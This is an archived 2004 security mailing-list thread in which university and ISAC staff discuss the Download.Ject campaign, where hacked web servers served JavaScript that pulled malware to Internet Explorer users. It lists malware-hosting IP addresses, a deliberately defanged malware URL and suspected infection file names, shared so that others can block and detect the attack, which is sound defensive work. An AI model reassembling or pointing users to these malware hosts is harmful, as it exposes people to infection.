Educause Security Discussion mailing list archives
Re: malware in images
From: Brian Eckman <eckman () UMN EDU>
Date: Thu, 24 Jun 2004 12:12:04 -0500
Kathy Bergsma wrote:
In addition to 217.107.218.147, we detected similar exploits from the following addresses. 64.46.100.96 65.254.51.42 66.98.190.22 67.15.42.34 67.18.79.20 69.50.170.214 69.93.54.158 81.211.105.24 195.208.235.66 207.150.192.12 213.159.117.131 ============= Kathy Bergsma UF Information Security Manager 352-392-2061
Am I mistaken, or is that just a list of IP addresses that have at least one Web site on them that is exploiting the unpatched IE flaw outlined at http://62.131.86.111/analysis.htm ? What Doug is reporting is that a bunch of legitimate Web sites were hacked and had a specific piece of malware installed on them that pointed users to a specific URL. This means users visiting "legitimate" sites are being exploited, which is significant news. The other IP addresses have Web sites on them that are not what I would call "legitimate", and are typically getting people to visit them via Spam. FWIW, See http://securityfocus.com/archive/1/365693/2004-06-09/2004-06-15/0 for details on how to make IE not vulnerable to this or just about any other currently working unpatched exploit. Thanks, Brian
On Thu, 24 Jun 2004, Doug Pearson wrote:There's a bunch of folks scrambling at AV vendors, US-CERT, etc. to figure this one out. Some snippets of information include: - A large number of web servers were compromised with the malware, including many prominent sites. Those are being cleaned up as identified. The "RFI - Russians IIS Hacks?" described at http://isc.sans.org/diary.php appears to be related to this. - The URL (reported below) varies it's response according to the User-Agent string. From Mozilla or wget you get a broken link. If the User-Agent string is IE's, you get new.html which is a variation on the recent 0day using the redirection injection bug and java-script loaders. - Unconfirmed, but -possible- indication of infection is files Jjjknk32.exe, Edhmifcj.dll, and surf.dat files in the /windows/system32 directory. It appears that the site/URL listed below is still active. Highly recommend blocking at your network border. Regards, Doug Pearson Research and Education Networking ISAC http://www.ren-isac.net Watch Desk 24x7: +1(317)278-6630 ----- At 10:32 PM 6/23/2004 -0500, Doug Pearson wrote: There's *early* report of lots of sites infected with images that contain malware. The Javascript appended to the images reaches back to "http: // 217.107.218.147/ dot.php" to get the next dose of malware. The embedded spaces in the URL are mine to prevent accidental launches. I'm running a current Symantec AV on my desktop. SAV catches what's at the URL as: Scan type: Realtime Protection Scan Event: Virus Found! Virus name: Download.Ject File: [obfuscated by Doug P]new[1].htm [and so forth...] Sites may wish to apply local network filters to block 217.107.218.147! Regards, Doug Pearson Research and Education Networking ISAC http://www.ren-isac.net Watch Desk 24x7: +1(317)278-6630 ********** Participation and subscription information for this EDUCAUSE Discussion Group discussion list can be found at http://www.educause.edu/cg/.********** Participation and subscription information for this EDUCAUSE Discussion Group discussion list can be found at http://www.educause.edu/cg/.
-- Brian Eckman Security Analyst OIT Security and Assurance University of Minnesota 612-626-7737 "There are 10 types of people in this world. Those who understand binary and those who don't." ********** Participation and subscription information for this EDUCAUSE Discussion Group discussion list can be found at http://www.educause.edu/cg/.
Current thread:
- malware in images Doug Pearson (Jun 23)
- <Possible follow-ups>
- Re: malware in images Doug Pearson (Jun 24)
- Re: malware in images Kathy Bergsma (Jun 24)
- Re: malware in images Brian Eckman (Jun 24)
- Re: malware in images Jordan Wiens (Jun 24)
- Re: malware in images Jeff Kell (Jun 24)